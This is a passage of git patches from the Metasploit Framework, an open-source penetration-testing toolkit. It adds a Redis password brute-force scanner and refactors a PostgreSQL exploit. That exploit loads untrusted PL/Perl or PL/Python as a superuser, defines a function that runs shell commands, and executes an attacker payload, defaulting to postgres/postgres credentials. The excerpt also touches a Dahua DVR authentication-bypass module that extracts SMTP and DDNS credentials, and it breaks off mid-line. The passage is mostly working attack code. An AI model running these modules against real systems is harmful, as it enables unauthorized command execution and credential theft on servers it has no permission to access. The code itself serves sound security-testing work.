Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it # actually is a valid module. # # @param [String] path to module without the type directory. @@ -498,8 +495,8 @@ class Msf::Modules::Loader::Base end # Returns an Array of names to make a fully qualified module name to - # wrap the Metasploit(1|2|3) class so that it doesn't overwrite other - # (metasploit) module's classes. Invalid module name characters are + # wrap the Metasploit class so that it doesn't overwrite other + # (metasploit) module's classes. Invalid module name characters are # escaped by using 'H*' unpacking and prefixing each code with X so # the code remains a valid module name when it starts with a digit. # @@ -622,7 +619,7 @@ class Msf::Modules::Loader::Base self.class.typed_path(type, module_reference_name) end - # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if + # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if # it is defined. # # @param [Msf::Module] metasploit_class As returned by {Msf::Modules::Namespace#metasploit_class} From a929dc0e3520b249a87179b784b774c6c5b3a920 Mon Sep 17 00:00:00 2001 From: nixawk Date: Wed, 30 Dec 2015 18:54:25 +0800 Subject: [PATCH 180/686] add redis_login --- .../framework/login_scanner/redis.rb | 89 ++++++++++++++++++ .../auxiliary/scanner/redis/redis_login.rb | 94 +++++++++++++++++++ 2 files changed, 183 insertions(+) create mode 100644 lib/metasploit/framework/login_scanner/redis.rb create mode 100644 modules/auxiliary/scanner/redis/redis_login.rb diff --git a/lib/metasploit/framework/login_scanner/redis.rb b/lib/metasploit/framework/login_scanner/redis.rb new file mode 100644 index 0000000000..b190d81ae0 --- /dev/null +++ b/lib/metasploit/framework/login_scanner/redis.rb @@ -0,0 +1,89 @@ +require 'metasploit/framework/login_scanner/base' +require 'metasploit/framework/login_scanner/rex_socket' +require 'metasploit/framework/tcp/client' + +module Metasploit + module Framework + module LoginScanner + + # This is the LoginScanner class for dealing with REDIS. + # It is responsible for taking a single target, and a list of credentials + # and attempting them. It then saves the results. + + class REDIS + include Metasploit::Framework::LoginScanner::Base + include Metasploit::Framework::LoginScanner::RexSocket + include Metasploit::Framework::Tcp::Client + + DEFAULT_PORT = 6379 + LIKELY_PORTS = [ DEFAULT_PORT ] + LIKELY_SERVICE_NAMES = [ 'redis' ] + PRIVATE_TYPES = [ :password ] + REALM_KEY = nil + + # This method can create redis command which can be read by redis server + def redis_proto(command_parts) + return if command_parts.blank? + command = "*#{command_parts.length}\r\n" + command_parts.each do |p| + command << "$#{p.length}\r\n#{p}\r\n" + end + command + end + + # This method attempts a single login with a single credential against the target + # @param credential [Credential] The credential object to attempt to login with + # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object + def attempt_login(credential) + result_options = { + credential: credential, + status: Metasploit::Model::Login::Status::INCORRECT, + host: host, + port: port, + protocol: 'tcp', + service_name: 'redis' + } + + disconnect if self.sock + + begin + connect + select([sock], nil, nil, 0.4) + + command = redis_proto(['PING']) + sock.put(command) + result_options[:proof] = sock.get_once + + if result_options[:proof] && result_options[:proof] =~ /(?ERR operation not permitted|NOAUTH Authentication required)/i + command = redis_proto(['AUTH', "#{credential.private}"]) + sock.put(command) + result_options[:proof] = sock.get_once(-1, 16) + + if result_options[:proof] && result_options[:proof][/^\+OK/] + result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL + end + end + + rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e + result_options.merge!( + proof: e, + status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT + ) + end + disconnect if self.sock + ::Metasploit::Framework::LoginScanner::Result.new(result_options) + end + + private + + # (see Base#set_sane_defaults) + def set_sane_defaults + self.connection_timeout ||= 30 + self.port ||= DEFAULT_PORT + self.max_send_size ||= 0 + self.send_delay ||= 0 + end + end + end + end +end diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb new file mode 100644 index 0000000000..8b9df05ebd --- /dev/null +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -0,0 +1,94 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'metasploit/framework/login_scanner/redis' +require 'metasploit/framework/credential_collection' + +class Metasploit3 < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Redis Login Utility', + 'Description' => 'This module attempts to authenticate to an REDIS service.', + 'Author' => [ 'Nixawk' ], + 'References' => [ + ['URL', 'http://redis.io/topics/protocol'] + ], + 'License' => MSF_LICENSE)) + + register_options( + [ + Opt::RPORT(6379), + OptPath.new('PASS_FILE', + [ + false, + 'The file that contains a list of of probable passwords.', + File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') + ]) + ], self.class) + end + + def target + "#{rhost}:#{rport}" + end + + def run_host(ip) + cred_collection = Metasploit::Framework::CredentialCollection.new( + blank_passwords: datastore['BLANK_PASSWORDS'], + pass_file: datastore['PASS_FILE'], + password: datastore['PASSWORD'], + user_file: datastore['USER_FILE'], + userpass_file: datastore['USERPASS_FILE'], + username: datastore['USERNAME'], + user_as_pass: datastore['USER_AS_PASS'] + ) + + cred_collection = prepend_db_passwords(cred_collection) + + scanner = Metasploit::Framework::LoginScanner::REDIS.new( + host: ip, + port: rport, + ssl: datastore['SSL'], + cred_details: cred_collection, + stop_on_success: datastore['STOP_ON_SUCCESS'], + bruteforce_speed: datastore['BRUTEFORCE_SPEED'], + max_send_size: datastore['TCP::max_send_size'], + send_delay: datastore['TCP::send_delay'], + framework: framework, + framework_module: self, + ssl_version: datastore['SSLVersion'], + ssl_verify_mode: datastore['SSLVerifyMode'], + ssl_cipher: datastore['SSLCipher'], + local_port: datastore['CPORT'], + local_host: datastore['CHOST'] + ) + + scanner.scan! do |result| + credential_data = result.to_h + credential_data.merge!( + module_fullname: self.fullname, + workspace_id: myworkspace_id + ) + + if result.success? + credential_core = create_credential(credential_data) + credential_data[:core] = credential_core + create_credential_login(credential_data) + + print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}" + else + invalidate_login(credential_data) + vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + end + end + end +end From 814bf2a10285f00741f030fc01e04e3407589c38 Mon Sep 17 00:00:00 2001 From: Micheal Date: Fri, 1 Jan 2016 02:43:56 -0800 Subject: [PATCH 181/686] Execute commands on postgres through built-in functionality --- .../multi/postgres/postgres_createlang.rb | 264 ++++++++---------- 1 file changed, 120 insertions(+), 144 deletions(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index 5fd7138121..fdce8f7538 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', 'Description' => %q{ - Some installations of Postgres are configured to allow loading external
 scripting languages. + Some installations of Postgres 8 and 9 are configured to allow loading external
 scripting languages. Most commonly this is Perl and
 Python. When enabled, command execution is possible
 on the host. To execute system commands, loading the "untrusted" version of the language is necessary. This requires a superuser. This is usually postgres. The execution should be platform-agnostic, @@ -25,6 +25,8 @@ class Metasploit4 < Msf::Exploit::Remote This module attempts to load Perl or Python to execute system
 commands. As this dynamically loads a scripting language to execute commands,
 it is not necessary to drop a file on the filesystem.
 + + Only Postgres 8 and up are supported. }, 'Author' => [ 'Micheal Cottingham', # author of this module @@ -36,16 +38,16 @@ class Metasploit4 < Msf::Exploit::Remote ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] ], - 'Platform' => %w{python linux unix win osx}, + 'Platform' => %w{linux unix win osx}, 'Payload' => { - 'PayloadType' => %w{python cmd} + 'PayloadType' => %w{cmd} }, - 'Arch' => [ARCH_CMD, ARCH_PYTHON], + 'Arch' => [ARCH_CMD], 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, - 'DisclosureDate' => '' + 'DisclosureDate' => 'January 1 2016' )) register_options([ @@ -60,7 +62,16 @@ class Metasploit4 < Msf::Exploit::Remote version = postgres_fingerprint if version[:auth] - return CheckCode::Appears + version_match = version[:auth].match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) + major_version = version_match['major_version'] + + if major_version.to_i >= 8 + return CheckCode::Appears + + else + print_error 'Unsupported version' + return CheckCode::Safe + end else print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" @@ -76,127 +87,152 @@ class Metasploit4 < Msf::Exploit::Remote when :noconn; print_error 'Connection failed.'; return else - print_status("#{rhost}:#{rport} - #{version}") + print_status "#{rhost}:#{rport} - #{version}" end + version_match = version.match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) + major_version = version_match['major_version'] + extension = 'LANGUAGE' + + if major_version.to_i == 8 + print_status 'Selecting version 8 payload' + extension = 'LANGUAGE' + + elsif major_version.to_i >= 9 + print_status 'Selecting version 9 payload' + extension = 'EXTENSION' + + else + print_error 'Unsupported version - exploit failed' + return false + end + + print_warning 'This exploit does not clean up after itself - you will need to do that manually' + + # Attack! begin func_name = Rex::Text.rand_text_alpha(10) - load_perl = create_perl + languages = %w{perl python python2 python3} + loaded = false + iter = 0 - # Decision tree - not clean, but it works. - # If you have suggestions for improvement, please contact me on Github - @micheal - case load_perl - when 'exists' - print_status 'Perl is already loaded, continuing' - createPerlFunc(func_name) + languages.each do |language| + load_lang = create_language(language, extension) + human_language = language.capitalize.to_s - when 'loaded' - print_status 'Perl was successfully loaded, continuing' - createPerlFunc(func_name) + print_status "Attempting to load #{human_language}" - when 'not_exists' - print_status 'Perl is not installed on the target, attempting Python2' + case load_lang + when 'exists' + print_good "#{human_language} is already loaded, continuing" + create_function(language, func_name) + loaded = true - load_python2, ver = create_python2 + when 'loaded' + print_good "#{human_language} was successfully loaded, continuing" + create_function(language, func_name) + loaded = true - case load_python2 - when 'exists' - print_status 'Python2 is already loaded, continuing' - create_python_func(func_name, '') + when 'not_exists' + print_status "#{human_language} could not be loaded" - when 'loaded' - print_status 'Python2 was successfully loaded, continuing' - create_python_func(func_name, '') + else + print_error 'No exploit path found' + return false - when 'not_exists' - print_status 'Python2 is not installed on the target, attempting Python3' + end - load_python3 = create_python3 - - case load_python3 - when 'exists' - print_status 'Python3 is already loaded, continuing' - create_python_func(func_name, '3') - - when 'loaded' - print_status 'Python3 was successfully loaded, continuing' - create_python_func(func_name, '3') - - when 'not_exists' - print_error 'No suitable exploit path found, exiting' - return - end - end + break if loaded end + if loaded + # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say + # "NoMethodError undefined method `+' for nil:NilClass" + # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal + select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") - selectQuery = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") + case select_query.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." - case selectQuery.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + when :sql_error + print_error "Exploit failed" + return false - when :sql_error - print_error "#{rhost}:#{rport} Postgres - #{selectQuery[:sql_error]}" + when :complete + print_good 'Starting payload' + end - when :complete - vprint_good "#{rhost}:#{rport} Postgres - Command complete." + else + return false end rescue RuntimeError => e - print_error "Failed to create UDF: #{e.class}: #{e}" + print_error "Failed to create UDF: #{e.class}: #{e}" end postgres_logout if @postgres_conn end - def create_python2 - create = postgres_query("CREATE LANGUAGE plpythonasdfu") + def create_function(language, func_name) + load_func = '' - if(create.keys[0] == :sql_error) - matchExists = create[:sql_error].match(/language "plpythonu" already exists/m) + case language + when 'perl' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" + + "`$_[0]`;" + + "$$ LANGUAGE pl#{language}u") - if(matchExists) - return 'exists', '' + # Ruby doesn't do case folding ... :/ + when 'python' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + + "import subprocess, shlex\r" + + "subprocess.check_output(shlex.split(c))\r" + + "$$ LANGUAGE pl#{language}u") + + when 'python2' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + + "import subprocess, shlex\r" + + "subprocess.check_output(shlex.split(c))\r" + + "$$ LANGUAGE pl#{language}u") + + when 'python3' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + + "import subprocess, shlex\r" + + "subprocess.check_output(shlex.split(c))\r" + + "$$ LANGUAGE pl#{language}u") else - #matchError = create[:sql_error].match(/could not access file/m) - matchError = create[:sql_error].match(/unsupported language/m) + print_error 'Invalid language' + end - if(matchError) - # One more attempt - create2 = postgres_query("CREATE LANGUAGE plpythonu") + case load_func.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." - matchError2 = create2[:sql_error].match(/could not access file/m) + when :sql_error + print_error "#{rhost}:#{rport} Exploit failed" + return false - if(matchError2) - return 'not_exists' - - else - return 'loaded', '2' - end - end - end - - else - return 'loaded', '' + when :complete + print_good 'Loaded UDF' end end - def create_python3 - create = postgres_query("CREATE LANGUAGE plpython3u") + def create_language(language, extension) + load_language = postgres_query("CREATE #{extension} pl#{language}u") - if(create.keys[0] == :sql_error) - matchExists = create[:sql_error].match(/language "plpython3u" already exists/m) + if load_language.keys[0] == :sql_error + match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m) - if(matchExists) + if match_exists return 'exists' else - matchError = create[:sql_error].match(/could not access file/m) + match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m) - if(matchError) + if match_error return 'not_exists' end end @@ -206,66 +242,6 @@ class Metasploit4 < Msf::Exploit::Remote end end - def create_python_func(name, version) - create_python_function = postgres_query( - "CREATE OR REPLACE FUNCTION exec_#{name}(c text) RETURNS void as $$" + - "import subprocess, shlex" + - "return subprocess.check_output(shlex.split(c))" + - "$$ LANGUAGE plpython#{version}u") - - case create_python_function.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." - - when :sql_error - print_error "#{rhost}:#{rport} Postgres - #{create_python_function[:sql_error]}" - - when :complete - print_good "#{rhost}:#{rport} Postgres - Command complete." - end - end - - def create_perl - create = postgres_query("CREATE LANGUAGE plasdfu", 50) - - if(create.keys[0] == :sql_error) - matchExists = create[:sql_error].match(/language "plperlu" already exists/m) - - if(matchExists) - return 'exists' - - else - matchError = create[:sql_error].match(/could not access file/m) - return 'not_exists' - - if(matchError) - return 'not_exists' - end - end - - else - return 'loaded' - end - end - - def createPerlFunc(name) - createPerlFunction = postgres_query( - "CREATE OR REPLACE FUNCTION exec_#{name}(text) RETURNS TEXT as $$" + - "return `$_[0]`;" + - "$$ LANGUAGE plperlu") - - case createPerlFunction.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." - - when :sql_error - print_error "#{rhost}:#{rport} Postgres - #{createPerlFunction[:sql_error]}" - - when :complete - print_good "#{rhost}:#{rport} Postgres - Command complete." - end - end - # Authenticate to the postgres server.
 # Returns the version from #postgres_fingerprint def do_login(user=nil, pass=nil, database=nil) From 2fd796a699ad41fabc25b4faec0852fd1d5575fa Mon Sep 17 00:00:00 2001 From: Micheal Date: Fri, 1 Jan 2016 03:51:00 -0800 Subject: [PATCH 182/686] Execute commands on postgres through built-in functionality --- .../multi/postgres/postgres_createlang.rb | 417 +++++++++--------- 1 file changed, 207 insertions(+), 210 deletions(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index fdce8f7538..f50c634340 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -7,271 +7,268 @@ require 'msf/core' require 'msf/core/exploit/postgres' class Metasploit4 < Msf::Exploit::Remote - Rank = GoodRanking + Rank = GoodRanking - include Msf::Exploit::Remote::Postgres - include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Postgres + include Msf::Auxiliary::Report - # Creates an instance of this module.
 - def initialize(info = {}) - super(update_info(info, - 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', - 'Description' => %q{ - Some installations of Postgres 8 and 9 are configured to allow loading external
 scripting languages. - Most commonly this is Perl and
 Python. When enabled, command execution is possible
 on the host. - To execute system commands, loading the "untrusted" version of the language is necessary. - This requires a superuser. This is usually postgres. The execution should be platform-agnostic, - and has been tested on OS X, Windows, and Linux. + # Creates an instance of this module. + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q( + Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. + Most commonly this is Perl and Python. When enabled, command execution is possible on the host. + To execute system commands, loading the "untrusted" version of the language is necessary. + This requires a superuser. This is usually postgres. The execution should be platform-agnostic, + and has been tested on OS X, Windows, and Linux. - This module attempts to load Perl or Python to execute system
 commands. As this dynamically loads - a scripting language to execute commands,
 it is not necessary to drop a file on the filesystem.
 + This module attempts to load Perl or Python to execute system commands. As this dynamically loads + a scripting language to execute commands, it is not necessary to drop a file on the filesystem. - Only Postgres 8 and up are supported. - }, - 'Author' => [ - 'Micheal Cottingham', # author of this module - 'midnitesnake', # the postgres_payload module that this is based on - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], - ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], - ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] - ], - 'Platform' => %w{linux unix win osx}, - 'Payload' => { - 'PayloadType' => %w{cmd} - }, - 'Arch' => [ARCH_CMD], - 'Targets' => [ - ['Automatic', {}] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'January 1 2016' - )) + Only Postgres 8 and up are supported. + ), + 'Author' => [ + 'Micheal Cottingham', # author of this module + 'midnitesnake', # the postgres_payload module that this is based on + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] + ], + 'Platform' => %w(linux unix win osx), + 'Payload' => { + 'PayloadType' => %w(cmd) + }, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 1 2016') + ) - register_options([ - OptString.new('USERNAME', [true, 'The username to the service', 'postgres']), - OptString.new('PASSWORD', [true, 'The password to the service', 'postgres']) - ], self.class) + register_options([ + OptString.new('USERNAME', [true, 'The username to the service', 'postgres']), + OptString.new('PASSWORD', [true, 'The password to the service', 'postgres']) + ], self.class) - deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') - end + deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') + end - def check - version = postgres_fingerprint + def check + version = postgres_fingerprint - if version[:auth] - version_match = version[:auth].match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) - major_version = version_match['major_version'] + if version[:auth] + version_match = version[:auth].match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) + major_version = version_match['major_version'] - if major_version.to_i >= 8 - return CheckCode::Appears + if major_version.to_i >= 8 + return CheckCode::Appears - else - print_error 'Unsupported version' - return CheckCode::Safe - end + else + print_error 'Unsupported version' + return CheckCode::Safe + end - else - print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" - return CheckCode::Safe - end - end + else + print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + return CheckCode::Safe + end + end - def exploit - version = do_login(username, password, database) + def exploit + version = do_login(username, password, database) - case version - when :noauth; print_error 'Authentication failed.'; return - when :noconn; print_error 'Connection failed.'; return + case version + when :noauth + print_error 'Authentication failed.' + return - else - print_status "#{rhost}:#{rport} - #{version}" - end + when :noconn + print_error 'Connection failed.' + return - version_match = version.match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) - major_version = version_match['major_version'] - extension = 'LANGUAGE' + else + print_status "#{rhost}:#{rport} - #{version}" + end - if major_version.to_i == 8 - print_status 'Selecting version 8 payload' - extension = 'LANGUAGE' + version_match = version.match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) + major_version = version_match['major_version'] + extension = 'LANGUAGE' - elsif major_version.to_i >= 9 - print_status 'Selecting version 9 payload' - extension = 'EXTENSION' + if major_version.to_i == 8 + print_status 'Selecting version 8 payload' + extension = 'LANGUAGE' - else - print_error 'Unsupported version - exploit failed' - return false - end + elsif major_version.to_i >= 9 + print_status 'Selecting version 9 payload' + extension = 'EXTENSION' - print_warning 'This exploit does not clean up after itself - you will need to do that manually' + else + print_error 'Unsupported version - exploit failed' + return false + end - # Attack! - begin - func_name = Rex::Text.rand_text_alpha(10) + print_warning 'This exploit does not clean up after itself - you will need to do that manually' - languages = %w{perl python python2 python3} - loaded = false - iter = 0 + # Attack! + begin + func_name = Rex::Text.rand_text_alpha(10) - languages.each do |language| - load_lang = create_language(language, extension) - human_language = language.capitalize.to_s + languages = %w(perl python python2 python3) + loaded = false - print_status "Attempting to load #{human_language}" + languages.each do |language| + load_lang = create_language(language, extension) + human_language = language.capitalize.to_s - case load_lang - when 'exists' - print_good "#{human_language} is already loaded, continuing" - create_function(language, func_name) - loaded = true + print_status "Attempting to load #{human_language}" - when 'loaded' - print_good "#{human_language} was successfully loaded, continuing" - create_function(language, func_name) - loaded = true + case load_lang + when 'exists' + print_good "#{human_language} is already loaded, continuing" + create_function(language, func_name) + loaded = true - when 'not_exists' - print_status "#{human_language} could not be loaded" + when 'loaded' + print_good "#{human_language} was successfully loaded, continuing" + create_function(language, func_name) + loaded = true - else - print_error 'No exploit path found' - return false + when 'not_exists' + print_status "#{human_language} could not be loaded" - end + else + print_error 'No exploit path found' + return false + end - break if loaded - end + break if loaded + end - if loaded - # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say - # "NoMethodError undefined method `+' for nil:NilClass" - # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal - select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") + if loaded + # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say + # "NoMethodError undefined method `+' for nil:NilClass" + # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal + select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") - case select_query.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + case select_query.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." - when :sql_error - print_error "Exploit failed" - return false + when :sql_error + print_error "Exploit failed" + return false - when :complete - print_good 'Starting payload' - end + when :complete + print_good 'Starting payload' + end - else - return false - end + else + return false + end - rescue RuntimeError => e - print_error "Failed to create UDF: #{e.class}: #{e}" - end + rescue RuntimeError => e + print_error "Failed to create UDF: #{e.class}: #{e}" + end - postgres_logout if @postgres_conn - end + postgres_logout if @postgres_conn + end - def create_function(language, func_name) - load_func = '' + def create_function(language, func_name) + load_func = '' - case language - when 'perl' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" + - "`$_[0]`;" + - "$$ LANGUAGE pl#{language}u") + case language + when 'perl' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \ + "`$_[0]`;" \ + "$$ LANGUAGE pl#{language}u") - # Ruby doesn't do case folding ... :/ - when 'python' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + - "import subprocess, shlex\r" + - "subprocess.check_output(shlex.split(c))\r" + - "$$ LANGUAGE pl#{language}u") + # Ruby doesn't do case folding ... :/ + when 'python' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ + "import subprocess, shlex\r" \ + "subprocess.check_output(shlex.split(c))\r" \ + "$$ LANGUAGE pl#{language}u") - when 'python2' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + - "import subprocess, shlex\r" + - "subprocess.check_output(shlex.split(c))\r" + - "$$ LANGUAGE pl#{language}u") + when 'python2' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ + "import subprocess, shlex\r" \ + "subprocess.check_output(shlex.split(c))\r" \ + "$$ LANGUAGE pl#{language}u") - when 'python3' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + - "import subprocess, shlex\r" + - "subprocess.check_output(shlex.split(c))\r" + - "$$ LANGUAGE pl#{language}u") + when 'python3' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ + "import subprocess, shlex\r" \ + "subprocess.check_output(shlex.split(c))\r" \ + "$$ LANGUAGE pl#{language}u") - else - print_error 'Invalid language' - end + else + print_error 'Invalid language' + end - case load_func.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + case load_func.keys[0] + when :conn_error + print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." - when :sql_error - print_error "#{rhost}:#{rport} Exploit failed" - return false + when :sql_error + print_error "#{rhost}:#{rport} Exploit failed" + return false - when :complete - print_good 'Loaded UDF' - end - end + when :complete + print_good 'Loaded UDF' + end + end - def create_language(language, extension) - load_language = postgres_query("CREATE #{extension} pl#{language}u") + def create_language(language, extension) + load_language = postgres_query("CREATE #{extension} pl#{language}u") - if load_language.keys[0] == :sql_error - match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m) + if load_language.keys[0] == :sql_error + match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m) - if match_exists - return 'exists' + if match_exists + return 'exists' - else - match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m) + else + match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m) - if match_error - return 'not_exists' - end - end + if match_error + return 'not_exists' + end + end - else - return 'loaded' - end - end + else + return 'loaded' + end + end - # Authenticate to the postgres server.
 - # Returns the version from #postgres_fingerprint - def do_login(user=nil, pass=nil, database=nil) - begin - password = pass || postgres_password + # Authenticate to the postgres server. + # Returns the version from #postgres_fingerprint + def do_login(user, pass, database) + begin + password = pass || postgres_password - vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") + vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") - result = postgres_fingerprint( - :db => database, - :username => user, - :password => password - ) + result = postgres_fingerprint( + db: database, + username: user, + password: password + ) - if result[:auth] - report_service( - :host => rhost, - :port => rport, - :name => "postgres", - :info => result.values.first - ) - return result[:auth] + if result[:auth] + return result[:auth] - else - print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") - return :noauth - end + else + print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") + return :noauth + end - rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError - return :noconn - end - end + rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError + return :noconn + end + end end From 5c9c27691e55bd9341fb45e4009f6c82d764e970 Mon Sep 17 00:00:00 2001 From: Micheal Date: Fri, 1 Jan 2016 04:26:20 -0800 Subject: [PATCH 183/686] Execute commands on postgres through built-in functionality --- modules/exploits/multi/postgres/postgres_createlang.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index f50c634340..acecd9ea0d 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -233,7 +233,7 @@ class Metasploit4 < Msf::Exploit::Remote return 'exists' else - match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m) + match_error = load_language[:sql_error].match(/(could not (open extension control|access) file|unsupported language)/m) if match_error return 'not_exists' From aa2922e6c3196866da3e40704509a815a0b95f88 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 5 Jan 2016 14:54:48 -0500 Subject: [PATCH 184/686] added in verbose mode for ddns and fixed report_email_creds issue --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index cb4ab07090..5cd86586aa 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary print_good(" SMTP User: #{data[5]}") print_good(" SMTP Password: #{data[6]}") return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? - report_email_creds(mailserver, mailport, muser, mpass) + report_email_cred(mailserver, mailport, muser, mpass) end def grab_ddns @@ -144,7 +144,9 @@ class Metasploit3 < Msf::Auxiliary ddns_pass = val[5] ddns_table << 